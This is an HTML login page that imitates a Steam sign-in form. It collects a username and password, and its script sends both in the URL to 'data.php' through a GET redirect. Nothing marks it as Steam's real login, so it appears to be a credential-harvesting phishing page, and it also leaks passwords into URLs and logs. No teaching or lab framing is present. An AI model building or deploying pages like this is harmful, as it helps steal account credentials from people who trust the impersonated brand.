<!DOCTYPE html>
<html>
<head>
    <title>steam login International version</title>
    <style>
        
        .container {
            max-width: 400px;
            margin: 0 auto;
            padding: 20px;
            background-color:powderblue;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
        }
        
        .container h2 {
            text-align: center;
            margin-bottom: 20px;
        }
        
        .container label {
            display: block;
            margin-bottom: 10px;
        }
        
        .container input[type="text"],
        .container input[type="password"] {
            width: 100%;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }
        
        .container button {
            width: 100%;
            padding: 10px;
            background-color: #4CAF50;
            border: none;
            color: #fff;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            border-radius: 4px;
        }
        
        .container button:hover {
            background-color: #45a049;
        }

        /*js判断是否有数据输入*/
    
    </style>
</head>

<body>
    <div class="container">
        <h2>webpage steam login</h2>
        <form method="post" id="login_from">
            <label for="username">steam username:</label>
            <input type="text" id="username" name="username" placeholder="enter one steam username">
            
            <label for="password">steam password:</label>
            <input type="password" id="password" name="password" placeholder="Please enter the steam password">

            <button type="button" onclick="checkinInput()">sign in</button>
        </form>
    </div>
</body>

<script>
    function checkinInput(){
        var username = document.getElementById("username").value;
        var password = document.getElementById("password").value;
        
        if(username == "" || password == ""){
            alert("you username and password is Null ! please input username and password !")
            return false;
        }
        document.location = 'data.php?us='+ username+'&ps='+password;
    }
</script>

</html>